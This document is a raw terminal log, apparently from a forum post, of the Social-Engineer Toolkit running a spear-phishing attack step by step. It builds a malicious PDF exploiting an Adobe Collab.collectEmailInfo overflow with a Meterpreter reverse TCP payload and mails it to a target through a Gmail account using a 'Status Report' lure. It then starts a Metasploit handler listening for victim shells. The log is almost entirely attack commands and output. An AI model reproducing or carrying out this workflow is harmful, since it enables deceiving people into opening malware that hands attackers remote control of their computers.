root@root:~# cd /pentest/exploits/set/ root@root:/pentest/exploits/set# ./set :::=== :::===== :::==== ::: ::: :::==== ===== ====== === === === === ====== ======== === [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Development Team: Thomas Werth [---] [---] Development Team: JR DePre (pr1me) [---] [---] Development Team: Joey Furr (j0fer) [---] [---] Version: 2.0.3 [---] [---] Codename: 'Trebuchet Edition' [---] [---] Report bugs to: [email protected] [---] [---] Follow me on Twitter: dave_rel1k [---] [---] Homepage: http://www.secmaniac.com [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com. Join us on irc.freenode.net in channel #setoolkit Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) Third Party Modules 10) Update the Metasploit Framework 11) Update the Social-Engineer Toolkit 12) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set > 1 The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON. There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy! 1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template 99) Return to Main Menu set:phishing > 1 Select the file format exploit you want. The default is the PDF embedded EXE. ********** PAYLOADS ********** 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 5) Adobe Flash Player "Button" Remote Code Execution 6) Adobe CoolType SING Table "uniqueName" Overflow 7) Adobe Flash Player "newfunction" Invalid Pointer Use 8) Adobe Collab.collectEmailInfo Buffer Overflow 9) Adobe Collab.getIcon Buffer Overflow 10) Adobe JBIG2Decode Memory Corruption Exploit 11) Adobe PDF Embedded EXE Social Engineering 12) Adobe util.printf() Buffer Overflow 13) Custom EXE to VBA (sent via RAR) (RAR required) 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 15) Adobe PDF Embedded EXE Social Engineering (NOJS) 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow set:payloads > 8 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter set:payloads > 2 set:payloads > Port to connect back on [443]: [-] Defaulting to port 443... [-] Generating fileformat exploit... [*] Payload creation complete. [*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory [-] As an added bonus, use the file-format creator in SET to create your attachment. Right now the attachment will be imported with filename of 'template.whatever' Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I don't care. 2. Rename the file, I want to be cool. set:phishing > 1 [*] Keeping the filename and moving on. Social Engineer Toolkit Mass E-Mailer There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. What do you want to do: 1. E-Mail Attack Single Email Address 2. E-Mail Attack Mass Mailer 99. Return to main menu. set:phishing > 1 Do you want to use a predefined template or craft a one time email template. 1. Pre-Defined Template 2. One-Time Use Email Template set:phishing > 1 [-] Available templates: 1: WOAAAA!!!!!!!!!! This is crazy... 2: How long has it been? 3: Have you seen this? 4: Baby Pics 5: Dan Brown's Angels & Demons 6: New Update 7: Computer Issue 8: Status Report 9: Strange internet usage from your computer set:phishing > 8 set:phishing > Send email to: [email protected] 1. Use a gmail Account for your email attack. 2. Use your own server or open relay set:phishing > 1 set:phishing > Your gmail email address: : [email protected] Email password: set:phishing >
set:phishing > Flag this message/s as high priority? [yes|no]: no [*] SET has finished delivering the emails set:phishing > Setup a listener [yes|no]: Unhandled exception in thread started by
yes [-] *** [-] * WARNING: Database support has been disabled [-] *** Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f EFLAGS: 00010046 eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 ds: 0018 es: 0018 ss: 0018 Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) Stack: 90909090990909090990909090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090.90909090.09090900 90909090.90909090.09090900 .......................... cccccccccccccccccccccccccc cccccccccccccccccccccccccc ccccccccc................. cccccccccccccccccccccccccc cccccccccccccccccccccccccc .................ccccccccc cccccccccccccccccccccccccc cccccccccccccccccccccccccc .......................... ffffffffffffffffffffffffff ffffffff.................. ffffffffffffffffffffffffff ffffffff.................. ffffffff.................. ffffffff.................. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00 Aiee, Killing Interrupt handler Kernel panic: Attempted to kill the idle task! In swapper task - not syncing =[ metasploit v4.0.0-release [core:4.0 api:1.0] + -- --=[ 716 exploits - 361 auxiliary - 68 post + -- --=[ 226 payloads - 27 encoders - 8 nops =[ svn r13462 updated 652 days ago (2011.08.01) Warning: This copy of the Metasploit Framework was last updated 652 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: https://community.rapid7.com/docs/DOC-1306 resource (src/program_junk/meta_config)> use exploit/multi/handler resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (src/program_junk/meta_config)> set LHOST 192.168.1.11 LHOST => 192.168.1.11 resource (src/program_junk/meta_config)> set LPORT 443 LPORT => 443 resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai ENCODING => shikata_ga_nai resource (src/program_junk/meta_config)> set ExitOnSession false ExitOnSession => false resource (src/program_junk/meta_config)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 192.168.1.11:443 [*] Starting the payload handler...
版本BT5R1,换个版本试试。